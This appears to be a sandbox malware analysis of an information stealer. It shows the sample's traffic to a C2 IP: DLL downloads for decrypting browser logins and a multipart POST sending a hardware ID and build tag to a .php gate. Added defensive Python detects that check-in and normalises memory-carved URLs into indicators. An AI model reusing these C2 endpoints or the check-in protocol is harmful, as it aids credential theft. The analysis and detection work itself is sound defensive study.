              Source: unknownHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBFHost: 45.93.20.28Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 45 36 34 42 32 30 32 35 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 72 75 6d 70 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="hwid"58E64B20250F807656615------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="build"trump------KFHJJJKKFHIDAAKFBFBF--
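The rows above record the sample's whole network life: a GET / to 45.93.20.28 with no DNS lookup, seven DLL downloads from /c66c0eade263c9a8/ (nss3, softokn3, freebl3 and mozglue are Mozilla NSS, joined by sqlite3 and the MSVC runtime: the libraries a stealer uses to decrypt Firefox's saved logins on the victim), and a multipart POST of a hardware id plus a build tag ("trump") to the .php gate. The Python below is an added example, not Joe Sandbox output and not code from the sample: it parses the multipart check-in body (reconstructed byte for byte from the Data Raw hex above, and exactly 211 bytes long, which matches the Content-Length header) and classifies a captured session by those three signals. The request objects, the TOOLKIT_DLLS set, the verdict strings and the threshold of five DLLs are the author's choices.

```python
"""Added example: recognise the loader/check-in sequence recorded in the report.

Constructed from the report's rows: GET /, seven DLL fetches from
/c66c0eade263c9a8/, then a multipart POST of hwid+build to the .php gate,
all to a literal IPv4 Host with no DNS. Names and thresholds are the
author's choices, not Joe Sandbox or Stealc/Vidar code.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional
import ipaddress
import re

# The seven helper DLLs fetched in the report (Mozilla NSS + SQLite + MSVC runtime).
TOOLKIT_DLLS = frozenset({
    "sqlite3.dll", "freebl3.dll", "mozglue.dll", "msvcp140.dll",
    "nss3.dll", "softokn3.dll", "vcruntime140.dll",
})


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""


def parse_multipart(body: bytes, boundary: str) -> Dict[str, str]:
    """Return {field name: value} for a multipart/form-data body.

    Parts are delimited by '--' + boundary; the closing delimiter ends in '--'.
    """
    delimiter = b"--" + boundary.encode("ascii")
    fields: Dict[str, str] = {}
    for part in body.split(delimiter):
        part = part.strip(b"\r\n")
        if not part or part == b"--":          # leading empty chunk / closing marker
            continue
        head, _, value = part.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', head)
        if match:
            fields[match.group(1).decode("ascii")] = value.decode("latin-1")
    return fields


def boundary_of(content_type: str) -> Optional[str]:
    match = re.search(r"boundary=([^;\s]+)", content_type)
    return match.group(1) if match else None


def host_is_bare_ip(host: str) -> bool:
    """True when the Host header is a literal IPv4/IPv6 address (so no DNS was needed)."""
    try:
        ipaddress.ip_address(host.split(":")[0])   # strip an optional :port (IPv4 form)
    except ValueError:
        return False
    return True


def classify(requests: List[HttpRequest]) -> dict:
    """Summarise one HTTP session and give a verdict on the stealer pattern."""
    result = {"bare_ip_hosts": set(), "toolkit_dlls": set(), "checkin": None}
    for req in requests:
        host = req.headers.get("Host", "")
        if host_is_bare_ip(host):
            result["bare_ip_hosts"].add(host)
        filename = req.path.rsplit("/", 1)[-1].lower()
        if req.method == "GET" and filename in TOOLKIT_DLLS:
            result["toolkit_dlls"].add(filename)
        ctype = req.headers.get("Content-Type", "")
        boundary = boundary_of(ctype) if req.method == "POST" else None
        if boundary and "multipart/form-data" in ctype:
            fields = parse_multipart(req.body, boundary)
            if {"hwid", "build"}.issubset(fields):
                result["checkin"] = {"host": host, "path": req.path, **fields}
    # The hwid/build check-in to a bare IP is the strongest signal. The DLL set alone
    # still deserves an alert: nothing legitimate fetches exactly these seven files
    # over plain HTTP from a literal IP address.
    if result["checkin"] and result["checkin"]["host"] in result["bare_ip_hosts"]:
        result["verdict"] = "stealer-checkin"
    elif len(result["toolkit_dlls"]) >= 5:          # author's threshold
        result["verdict"] = "toolkit-download"
    else:
        result["verdict"] = "clean"
    return result


C2 = "45.93.20.28"
BOUNDARY = "----KFHJJJKKFHIDAAKFBFBF"
# Body reconstructed from the report's "Data Raw" hex (211 bytes, as in Content-Length).
CHECKIN_BODY = (
    b"------KFHJJJKKFHIDAAKFBFBF\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"58E64B20250F807656615\r\n"
    b"------KFHJJJKKFHIDAAKFBFBF\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"trump\r\n"
    b"------KFHJJJKKFHIDAAKFBFBF--\r\n"
)

# Constructed session: the report's requests in order, plus one browser request as noise.
SESSION = [
    HttpRequest("GET", "/async/newtab_promos", {"Host": "www.google.com"}),
    HttpRequest("GET", "/", {"Host": C2, "Connection": "Keep-Alive"}),
    *[HttpRequest("GET", f"/c66c0eade263c9a8/{dll}", {"Host": C2}) for dll in sorted(TOOLKIT_DLLS)],
    HttpRequest("POST", "/85a1cacf11314eb8.php",
                {"Host": C2, "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
                 "Content-Length": str(len(CHECKIN_BODY))},
                CHECKIN_BODY),
]

if __name__ == "__main__":
    print(classify(SESSION))
```

The multipart parser is deliberately strict about the delimiter (two dashes plus the header's boundary, which is why the body shows six dashes for a four-dash boundary); a proxy log that only keeps the first line of the body would still show the boundary, and the hwid/build field pair is what separates this check-in from an ordinary form upload.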
               Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmp, test.exe, 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28
               Source: test.exe, 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/
               Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.php
               Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.php)
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpCash
               Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpJ
               Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpJ:
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000003.1362964366.0000000001803000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpStar
               Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpb:
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpc_qt
               Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpd
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpdge
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpexodus.conf.jsonni
               Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpk
               Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phps
               Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/freebl3.dll
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/mozglue.dll
               Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/mozglue.dllXgl
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/mozglue.dlld
               Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll
               Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll#
               Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll1
               Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dllE
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dll
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dll6
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dll;
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dll_
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dllata
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dllll
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dllllz
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dllowser
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1465195588.000000000BEF2000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/softokn3.dll
               Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/softokn3.dll5
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/softokn3.dllQ
               Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/softokn3.dlly
               Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/sqlite3.dll
               Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/sqlite3.dllBg
               Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1465195588.000000000BEF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dll
               Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dllK
               Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://45.93.20.2885a1cacf11314eb8.phpme
               Source: test.exe, 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.93.20.28f
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0A
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0C
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0N
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0X
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://www.digicert.com/CPS0
               Source: test.exe, test.exe, 00000000.00000002.1470973984.000000006CD2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
               Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1470831896.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.sqlite.org/copyright.html.
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBK.0.dr | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBK.0.dr | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBK.0.dr | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBK.0.dr | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
               Source: EHJJKFCBGIDGHIECGCBK.0.dr | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: https://mozilla.org0/
               Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.dr | String found in binary or memory: https://support.mozilla.org
               Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.dr | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
               Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.dr | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBK.0.dr | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
               Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: https://www.digicert.com/CPS0
               Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBK.0.dr | String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
               Source: test.exe, 00000000.00000003.1347180471.0000000001834000.00000004.00000020.00020000.00000000.sdmp, KKKJKEBK.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
               Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.dr | String found in binary or memory: https://www.mozilla.org
               Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/about/
               Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.dr | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
               Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/about/t.exe
               Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
               Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.dr | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
               Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
               Source: test.exe, 00000000.00000003.1426878099.000000000C153000.00000004.00000020.00020000.00000000.sdmp, IDGHDGIDAKEBAAKFCGHCBAKJDA.0.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
               Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.dr | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
               Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/
               Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/4
               Source: test.exe, 00000000.00000003.1426878099.000000000C153000.00000004.00000020.00020000.00000000.sdmp, IDGHDGIDAKEBAAKFCGHCBAKJDA.0.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
               Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
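Strings carved from process memory, as in the 45.93.20.28 rows above, carry trailing bytes from whatever sat next to them (".phpCash", "nss3.dllowser"), so pushing them into a blocklist verbatim yields dozens of near-duplicate IOCs and drops the damaged ones on the floor. The Python below is an added example, not part of the report and not Joe Sandbox code: it folds the 41 strings from those rows into the nine URLs the sample actually uses, keeps the residue per URL for review, and sets aside the two strings whose host part is damaged ("45.93.20.2885a1...", "45.93.20.28f") instead of guessing. The regexes, the function names and the rule "cut the path after the first .php/.dll/.exe, else keep the longest URL-safe prefix" are the author's.

```python
"""Added example: normalise memory-carved URL strings into a clean IOC set.

Sample input is copied from the report's "String found in binary or memory"
rows for 45.93.20.28. Regexes and function names are the author's.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# scheme :// dotted-quad; the host must be followed by "/" or the end of the string,
# so a URL whose slash was overwritten ("45.93.20.2885a1...") is rejected, not guessed.
HOST_RE = re.compile(r"^(https?)://(\d{1,3}(?:\.\d{1,3}){3})(?=/|$)(.*)$")
# Path that ends in an extension we expect on a stealer gate or payload.
FILE_PATH_RE = re.compile(r"^/(?:[A-Za-z0-9_-]+/)*[A-Za-z0-9_-]+\.(?:php|dll|exe)")
# Fallback: the longest URL-safe prefix when no known extension is present.
SAFE_PATH_RE = re.compile(r"^/[A-Za-z0-9_./-]*")


def canonical_url(raw: str) -> Optional[Tuple[str, str]]:
    """Return (canonical URL, residue) or None when the host part is not clean."""
    m = HOST_RE.match(raw)
    if not m:
        return None
    scheme, host, path = m.groups()
    if path in ("", "/"):
        return f"{scheme}://{host}/", ""
    pm = FILE_PATH_RE.match(path) or SAFE_PATH_RE.match(path)   # SAFE_PATH_RE always matches "/..."
    clean = pm.group(0)
    return f"{scheme}://{host}{clean}", path[len(clean):]


def canonicalize(strings: List[str]) -> Tuple[Dict[str, List[str]], List[str]]:
    """Group raw strings by canonical URL: returns ({url: [residues]}, unparsed)."""
    iocs: Dict[str, List[str]] = defaultdict(list)
    unparsed: List[str] = []
    for s in strings:
        hit = canonical_url(s)
        if hit is None:
            unparsed.append(s)
        else:
            url, residue = hit
            iocs[url].append(residue)
    return dict(iocs), unparsed


def ioc_list(strings: List[str]) -> List[str]:
    """Sorted, de-duplicated IOC URLs ready for blocking or hunting."""
    return sorted(canonicalize(strings)[0])


GATE = "http://45.93.20.28/85a1cacf11314eb8.php"
DLL_DIR = "http://45.93.20.28/c66c0eade263c9a8/"
# The 41 raw strings exactly as listed in the report, in report order.
RAW_STRINGS = [
    "http://45.93.20.28", "http://45.93.20.28/", GATE,
    *[GATE + t for t in (")", "Cash", "J", "J:", "Star", "b:", "c_qt", "d", "dge",
                         "exodus.conf.jsonni", "k", "s")],
    DLL_DIR + "freebl3.dll",
    *[DLL_DIR + "mozglue.dll" + t for t in ("", "Xgl", "d")],
    *[DLL_DIR + "msvcp140.dll" + t for t in ("", "#", "1", "E")],
    *[DLL_DIR + "nss3.dll" + t for t in ("", "6", ";", "_", "ata", "ll", "llz", "owser")],
    *[DLL_DIR + "softokn3.dll" + t for t in ("", "5", "Q", "y")],
    *[DLL_DIR + "sqlite3.dll" + t for t in ("", "Bg")],
    *[DLL_DIR + "vcruntime140.dll" + t for t in ("", "K")],
    "http://45.93.20.2885a1cacf11314eb8.phpme",   # slash overwritten: host part damaged
    "http://45.93.20.28f",                        # residue glued straight onto the host
]

if __name__ == "__main__":
    iocs, unparsed = canonicalize(RAW_STRINGS)
    for url, residues in iocs.items():
        print(f"{url}  x{len(residues)}  residues={sorted(set(r for r in residues if r))}")
    print("needs manual review:", unparsed)
```

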